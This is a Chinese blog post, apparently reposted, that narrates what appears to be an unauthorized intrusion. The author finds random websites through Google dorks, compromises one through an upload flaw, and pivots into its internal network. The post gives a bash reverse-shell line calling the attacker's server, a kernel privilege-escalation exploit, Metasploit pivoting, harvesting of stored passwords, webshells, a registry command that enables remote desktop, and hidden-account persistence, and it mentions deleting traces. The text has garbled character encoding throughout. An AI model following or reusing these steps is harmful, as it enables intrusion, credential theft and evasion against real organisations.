0X01? 突破邊界拿下shell

周末在家閑著沒事突然就想搞事情了，然后使用Google hack語法輸入inurl:xxx.xxx.xxx/upload批量搜索可能存在上傳點的網(wǎng)站，試了好幾個最后找到一個可利用的上傳點。

注：涉及敏感信息，圖片僅供參考，具體內(nèi)容自行填充。

0X02 反彈shell&提權(quán)

Linux下需要把shell反彈出來以方便我們操作，但是目標主機上既沒有nc也沒有python，查詢相關(guān)資料后嘗試了一下利用bash彈shell。需要一臺公網(wǎng)服務(wù)器，使用命令bash -i >& /dev/tcp/your ip/1234 0>&1公網(wǎng)服務(wù)器使用命令nc -lvp 1234監(jiān)聽1234端口

現(xiàn)在shell已經(jīng)反彈出來了，使用id命令查看當(dāng)前權(quán)限，發(fā)現(xiàn)僅為Apache，使用-uname -a 查看內(nèi)核版本，發(fā)現(xiàn)服務(wù)器內(nèi)核版本為2.6.31.5-127.fc12.1686

在exploit-db中搜索此版本的相關(guān)漏洞，經(jīng)過多次嘗試，發(fā)現(xiàn)了下面這個exp來提升權(quán)限。

?

Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation

然而問題又來了，目標主機上沒有g(shù)cc，怎么辦?只能撞撞運氣嘗試在本地編譯好，再傳到目標主機上去執(zhí)行。本地編譯好exp后傳到目標主機TMP路徑下，執(zhí)行命令chmod 777 a 賦予exp執(zhí)行權(quán)限，然后執(zhí)行./a獲取到root權(quán)限。

0X03 橫向滲透擼內(nèi)網(wǎng)

發(fā)現(xiàn)目標主機有內(nèi)網(wǎng)環(huán)境，個人比較喜歡用msf，于是生成了個msf木馬上傳執(zhí)行獲取到一個meterpretershell。這里需要注意的是生成木馬時LHOST填你的服務(wù)器公網(wǎng)ip，設(shè)置msf監(jiān)聽時LHOST需要填你服務(wù)器的內(nèi)網(wǎng)ip。

在meterpretershell里執(zhí)行run autoroute -s 10.1.1.0/24添加路由掃內(nèi)網(wǎng)445.發(fā)現(xiàn)一臺內(nèi)網(wǎng)機器存在ms17010但是session彈不回來，尷尬。

僵硬，變換思路在邊界服務(wù)器上尋找有價值的可利用信息。最后發(fā)現(xiàn)了幾個password.txt和一個批量更新密碼的腳本，找到一個長得像管理員的密碼，這里不得不說一下在內(nèi)網(wǎng)滲透中信息收集的重要性，這個密碼簡直太給力了。

因為是內(nèi)網(wǎng)，所以得用代理工具把本機代理進去，這里我用的是reGeorg-master,上傳tunnel.nosocket.php到網(wǎng)站目錄下，配合Proxifier進行全局代理(Linux下用proxychains)。用這個密碼登錄上了受害主機的ssh，ssh都拿到了，接下來把該刪掉的東西都刪掉。

掃描內(nèi)網(wǎng)機器10.1.1.17發(fā)現(xiàn)開了ftp,用上面那個密碼登錄進去了，就是這么巧。然后tfp傳馬，先傳了一個大馬。結(jié)果發(fā)現(xiàn)PHP版本太老了，然后上了個小馬，菜刀連接。直接system權(quán)限。

發(fā)現(xiàn)沒開3389，使用命令

REG?ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d?00000000?/f

一鍵開啟遠程桌面。建立隱藏賬戶，成功連入遠程桌面。

0X04 寫在后面的話

第一次從外網(wǎng)滲透到內(nèi)網(wǎng)，盯了三天終于擼下一臺，感覺這個內(nèi)網(wǎng)還有的擼，有時間再繼續(xù)搞。

?

總結(jié)

以上是生活随笔為你收集整理的记一次渗透测试实战的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。